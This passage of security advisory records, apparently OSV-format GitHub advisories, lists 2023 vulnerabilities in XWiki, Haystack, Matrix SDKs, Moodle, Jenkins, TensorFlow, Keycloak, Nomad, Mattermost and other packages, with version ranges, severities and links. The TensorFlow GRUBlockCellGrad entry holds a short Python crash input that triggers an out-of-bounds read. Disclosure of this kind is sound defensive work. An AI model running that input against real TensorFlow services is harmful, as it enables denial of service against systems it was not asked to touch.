[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.0-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-92wp-r7hm-42g7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26470'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/04e5a89d2879b160cdfaea846024d3d9c1a525e6'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/db3d1c62fc5fb59fefcda3b86065d2d362f55164'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/fdfce062642b0ac062da5cda033d25482f4600fa'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19223'}]
|
{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:50:41Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
|
1.4.0
|
GHSA-w7qg-j435-78qw
|
2023-04-06T22:53:10Z
|
2023-03-30T12:30:15Z
| null |
['CVE-2023-1712']
|
Use of hard-coded, security-relevant constants in deepset-ai/haystack
|
Use of Hard-coded, Security-relevant Constants in GitHub repository deepset-ai/haystack in version 1.15.0 and prior. A patch is available at commit 5fc84904f198de661d5b933fde756aa922bf09f1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'farm-haystack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.15.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1712'}, {'type': 'WEB', 'url': 'https://github.com/deepset-ai/haystack/pull/4535'}, {'type': 'WEB', 'url': 'https://github.com/deepset-ai/haystack/commit/5fc84904f198de661d5b933fde756aa922bf09f1'}, {'type': 'PACKAGE', 'url': 'https://github.com/deepset-ai/haystack'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/9a6b1fb4-ec9b-4cfa-af1e-9ce304924829'}]
|
{'cwe_ids': ['CWE-547'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T22:55:51Z', 'nvd_published_at': '2023-03-30T10:15:00Z'}
|
1.4.0
|
GHSA-2x9c-qwgf-94xr
|
2023-03-28T23:09:13Z
|
2023-03-28T19:57:57Z
| null |
['CVE-2022-36060']
|
matrix-react-sdk Prototype pollution vulnerability
|
### Impact
Events sent with special strings in key places can temporarily disrupt or impede the matrix-react-sdk from functioning properly, such as by causing room or event tile crashes. The remainder of the application can appear functional, though certain rooms/events will not be rendered.
### Patches
This is fixed in matrix-react-sdk 3.53.0
### Workarounds
There are no workarounds. Please upgrade immediately.
### References
https://learn.snyk.io/lessons/prototype-pollution/javascript/
### For more information
If you have any questions or comments about this advisory please email us at [security at matrix.org](mailto:security@matrix.org).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'matrix-react-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.53.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/security/advisories/GHSA-2x9c-qwgf-94xr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-36060'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-react-sdk'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/releases/tag/v3.53.0'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-28T19:57:57Z', 'nvd_published_at': '2023-03-28T21:15:00Z'}
|
1.4.0
|
GHSA-q2x3-2f9g-h559
|
2023-03-31T16:09:20Z
|
2023-03-23T21:30:18Z
| null |
['CVE-2023-28333']
|
Moodle's Mustache pix helper contained a potential Mustache injection risk if combined with user input
|
The Mustache pix helper contained a potential Mustache injection risk if combined with user input (note: This did not appear to be implemented/exploitable anywhere in the core Moodle LMS).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28333'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/128c0c21607a71f411611a0104b2a8c858dd6fca'}, {'type': 'WEB', 'url': 'https://git.moodle.org/gw?p=moodle.git;a=commitdiff;h=128c0c21607a71f411611a0104b2a8c858dd6fca'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3QZN34VSF4HTCW3C3ZP2OZYSLYUKADPF/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=445065'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:09:12Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
|
1.4.0
|
GHSA-h76p-mc68-jv3p
|
2023-03-17T14:44:28Z
|
2023-03-10T21:30:19Z
| null |
['CVE-2023-27901']
|
Denial of service in Jenkins Core
|
Jenkins 2.393 and earlier, LTS 2.375.3 and earlier uses the Apache Commons FileUpload library without specifying limits for the number of request parts introduced in version 1.5 for CVE-2023-24998 in org.kohsuke.stapler.RequestImpl, allowing attackers to trigger a denial of service.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.388'}, {'fixed': '2.394'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.375.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.376'}, {'fixed': '2.387.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27901'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27901.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-08/#SECURITY-3030'}]
|
{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:44:28Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
|
1.4.0
|
GHSA-mwq8-fjpf-c2gr
|
2023-03-30T20:19:18Z
|
2023-03-30T20:19:18Z
| null |
['CVE-2023-28427']
|
Prototype pollution in matrix-js-sdk (part 2)
|
### Impact
In certain configurations, data sent by remote servers containing special strings in key locations could cause modifications of the `Object.prototype`, disrupting matrix-js-sdk functionality, causing denial of service and potentially affecting program logic.
(This is part 2, where [CVE-2022-36059](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36059) / [GHSA-rfv9-x7hh-xc32](https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-rfv9-x7hh-xc32) is part 1. Part 2 covers remaining vectors not covered by part 1, found in a codebase audit scheduled after part 1.)
### Patches
The issue has been patched in matrix-js-sdk 24.0.0.
### Workarounds
None.
### References
- [Release blog post](https://matrix.org/blog/2023/03/28/security-releases-matrix-js-sdk-24-0-0-and-matrix-react-sdk-3-69-0)
- The advisory [GHSA-rfv9-x7hh-xc32](https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-rfv9-x7hh-xc32) ([CVE-2022-36059](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36059)) refers to an initial set of vulnerable locations discovered and patched in matrix-js-sdk 19.4.0. We opted not to disclose that advisory while we performed an audit of the codebase and are now disclosing it jointly with this one.
### For more information
If you have any questions or comments about this advisory please email us at [security at matrix.org](mailto:security@matrix.org).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'matrix-js-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '24.0.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-mwq8-fjpf-c2gr'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-rfv9-x7hh-xc32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28427'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-js-sdk'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/04/msg00027.html'}, {'type': 'WEB', 'url': 'https://matrix.org/blog/2023/03/28/security-releases-matrix-js-sdk-24-0-0-and-matrix-react-sdk-3-69-0'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202305-36'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5392'}]
|
{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T20:19:18Z', 'nvd_published_at': '2023-03-28T21:15:00Z'}
|
1.4.0
|
GHSA-68v3-g9cm-rmm6
|
2023-03-27T21:26:02Z
|
2023-03-24T21:53:25Z
| null |
['CVE-2023-25658']
|
TensorFlow vulnerable to Out-of-Bounds Read in GRUBlockCellGrad
|
### Impact
Out of bounds read in GRUBlockCellGrad
```python
func = tf.raw_ops.GRUBlockCellGrad
para = {'x': [[21.1, 156.2], [83.3, 115.4]], 'h_prev': array([[136.5],
[136.6]]), 'w_ru': array([[26.7, 0.8],
[47.9, 26.1],
[26.2, 26.3]]), 'w_c': array([[ 0.4],
[31.5],
[ 0.6]]), 'b_ru': array([0.1, 0.2 ], dtype=float32), 'b_c': 0x41414141, 'r': array([[0.3],
[0.4]], dtype=float32), 'u': array([[5.7],
[5.8]]), 'c': array([[52.9],
[53.1]]), 'd_h': array([[172.2],
[188.3 ]])}
```
### Patches
We have patched the issue in GitHub commit [ff459137c2716a2a60f7d441b855fcb466d778cb](https://github.com/tensorflow/tensorflow/commit/ff459137c2716a2a60f7d441b855fcb466d778cb).
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by r3pwnx.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-68v3-g9cm-rmm6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25658'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ff459137c2716a2a60f7d441b855fcb466d778cb'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:53:25Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-wm8x-php5-hvq6
|
2023-03-07T20:13:19Z
|
2023-03-07T20:13:19Z
| null |
[]
|
Maligned causes incorrect deallocation
|
`maligned::align_first` manually allocates with an alignment larger than T, and then uses `Vec::from_raw_parts` on that allocation to get a `Vec<T>`.
[`GlobalAlloc::dealloc`](https://doc.rust-lang.org/std/alloc/trait.GlobalAlloc.html#tymethod.dealloc) requires that the `layout` argument must be the same layout that was used to allocate that block of memory.
When deallocating, `Box` and `Vec` may not respect the specified alignment and can cause undefined behavior.
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'maligned'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tylerhawkes/maligned/issues/5'}, {'type': 'WEB', 'url': 'https://doc.rust-lang.org/std/alloc/trait.GlobalAlloc.html#tymethod.dealloc'}, {'type': 'PACKAGE', 'url': 'https://github.com/tylerhawkes/maligned'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0017.html'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:13:19Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9qwg-crg9-m2vc
|
2023-03-24T22:01:29Z
|
2023-03-24T22:01:29Z
| null |
[]
|
`openssl` `SubjectAlternativeName` and `ExtendedKeyUsage::other` allow arbitrary file read
|
`SubjectAlternativeName` and `ExtendedKeyUsage` arguments were parsed using the OpenSSL function `X509V3_EXT_nconf`. This function parses all input using an OpenSSL mini-language which can perform arbitrary file reads.
Thanks to David Benjamin (Google) for reporting this issue.
|
[]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.7'}, {'fixed': '0.10.48'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/1854'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0023.html'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:01:29Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9g98-5mj6-f9mv
|
2023-03-02T23:25:43Z
|
2023-03-02T23:25:43Z
| null |
['CVE-2023-0264']
|
Keycloak vulnerable to user impersonation via stolen UUID code
|
Keycloak's OpenID Connect user authentication was found to incorrectly authenticate requests. An authenticated attacker who could also obtain a certain piece of info from a user request, from a victim within the same realm, could use that data to impersonate the victim and generate new session tokens.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.0.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-9g98-5mj6-f9mv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0264'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/ec8109112e67208c13e13f6d1f8706a5a3ba8d4c'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-0264'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]
|
{'cwe_ids': ['CWE-287', 'CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:25:43Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fg7x-g82r-94qc
|
2023-06-06T17:12:32Z
|
2023-03-31T06:30:15Z
| null |
['CVE-2023-28756']
|
Ruby Time component ReDoS issue
|
A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'time'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.2.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'time'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28756'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/time'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/time/CVE-2023-28756.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/04/msg00033.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FFZANOQA4RYX7XCB42OO3P24DQKWHEKA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G76GZG3RAGYF4P75YY7J7TGYAU7Z5E2T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WMIOPLBAAM3FEQNAXA2L7BDKOGSVUT5Z/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230526-0004/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/downloads/releases/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2023/03/30/redos-in-time-cve-2023-28756/'}]
|
{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:43:54Z', 'nvd_published_at': '2023-03-31T04:15:00Z'}
|
1.4.0
|
GHSA-5g39-ppwg-6xx8
|
2023-03-16T18:32:38Z
|
2023-03-16T18:32:38Z
| null |
['CVE-2023-28105']
|
Go-huge-util vulnerable to path traversal when unzipping files
|
Impact
ZipSlip issue when use fsutil package to unzip files.
When users use zip.Unzip to unzip zip files from a malicious attacker, they may be vulnerable to path traversal.
Patches
It has been fixed in v0.0.34, Please upgrade version to v0.0.34 or above.
Workarounds
No, users have to upgrade version.
References
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/dablelv/go-huge-util/zip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.34'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/dablelv/go-huge-util'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.34'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/dablelv/go-huge-util/security/advisories/GHSA-5g39-ppwg-6xx8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28105'}, {'type': 'WEB', 'url': 'https://github.com/dablelv/go-huge-util/commit/0e308b0fac8973e6fa251b0ab095cdc5c1c0956b'}, {'type': 'PACKAGE', 'url': 'https://github.com/dablelv/go-huge-util'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:32:38Z', 'nvd_published_at': '2023-03-16T17:15:00Z'}
|
1.4.0
|
GHSA-63f2-6959-2pxj
|
2023-04-07T21:09:25Z
|
2023-03-31T12:30:16Z
| null |
['CVE-2023-1776']
|
Mattermost vulnerable to cross-site scripting (XSS)
|
Boards in Mattermost allows an attacker to upload a malicious SVG image file as an attachment to a card and share it using a direct link to the file.
[Issue Identifier](https://mattermost.com/security-updates/): MMSA-2023-00139
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.7.2'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.7.0'}, {'fixed': '7.7.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.7.1'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.1.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.1.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.8.0'}, {'fixed': '7.8.1'}]}], 'versions': ['7.8.0']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.39.3'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.10.10'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1776'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost-server'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T21:09:25Z', 'nvd_published_at': '2023-03-31T12:15:00Z'}
|
1.4.0
|
GHSA-x5j3-mq9g-8jc8
|
2023-03-22T21:48:43Z
|
2023-03-17T14:43:35Z
| null |
['CVE-2023-28106']
|
Cross-site Scripting (XSS) in UrlSlug Data type
|
### Impact
An attacker can use XSS to send a malicious script to an unsuspecting user.
### Patches
Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14669.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14669.patch manually.
### References
https://huntr.dev/bounties/fa77d780-9b23-404b-8c44-12108881d11a
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-x5j3-mq9g-8jc8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28106'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14669.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/c59d0bf1d03a5037b586fe06230694fa3818dbf2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/fa77d780-9b23-404b-8c44-12108881d11a'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:43:35Z', 'nvd_published_at': '2023-03-16T17:15:00Z'}
|
1.4.0
|
GHSA-rqm8-q8j9-662f
|
2023-03-17T16:59:18Z
|
2023-03-14T15:30:17Z
| null |
['CVE-2023-1299']
|
Nomad Job Submitter Privilege Escalation Using Workload Identity
|
### Summary
A vulnerability was identified in Nomad and Nomad Enterprise (“Nomad”) such that a user with the submit-job ACL capability can submit a job that can escalate to management-level privileges. This vulnerability, CVE-2023-1299, was introduced in Nomad 1.5.0 and fixed in Nomad 1.5.1.
### Background
Nomad 1.4.0 introduced the concept of workload identity so that tasks can access variables without needing to access them through Nomad HTTP API with an ACL token.
In 1.5.0, the identity block was introduced, which exposes the workload identity token to the workload so it can access Nomad HTTP API via a unix domain socket without configuring mTLS.
### Details
During internal testing, we discovered it was possible to abuse the workload identity to elevate to management-level privilege if the workload identity did not have any attached ACL policies.
### Remediation
Customers should evaluate the risk associated with this issue and consider upgrading to Nomad 1.5.1 or newer. See Nomad’s Upgrading for general guidance on this process.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}], 'versions': ['1.5.0']}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1299'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-08-nomad-job-submitter-privilege-escalation-using-workload-identity/51389'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/nomad'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T18:02:16Z', 'nvd_published_at': '2023-03-14T15:15:00Z'}
|
1.4.0
|
GHSA-rp78-4562-gx3c
|
2023-03-31T16:23:37Z
|
2023-03-29T18:30:30Z
|
2023-03-31T16:23:37Z
|
[]
|
Duplicate Advisory: pimcore is vulnerable to cross-site scripting in translate module
|
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of [GHSA-hfmg-g39c-5444](https://github.com/advisories/GHSA-hfmg-g39c-5444). This link is maintained ot preserve external references.
## Original Description
Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.20.
|
[]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1704'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/295f5e8d108b68198e36399bea0f69598eb108a0'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/84419c7b-ae29-401b-bdfd-5d0c498d320f'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T20:25:08Z', 'nvd_published_at': '2023-03-29T16:15:00Z'}
|
1.4.0
|
GHSA-2wmj-8mqg-r9q8
|
2023-03-13T19:16:03Z
|
2023-03-07T00:30:26Z
| null |
['CVE-2021-36397']
|
Moodle has Incorrect Default Permissions
|
In Moodle, insufficient capability checks meant message deletions were not limited to the current user.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0-beta'}, {'fixed': '3.11.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.8'}]}]}]
|
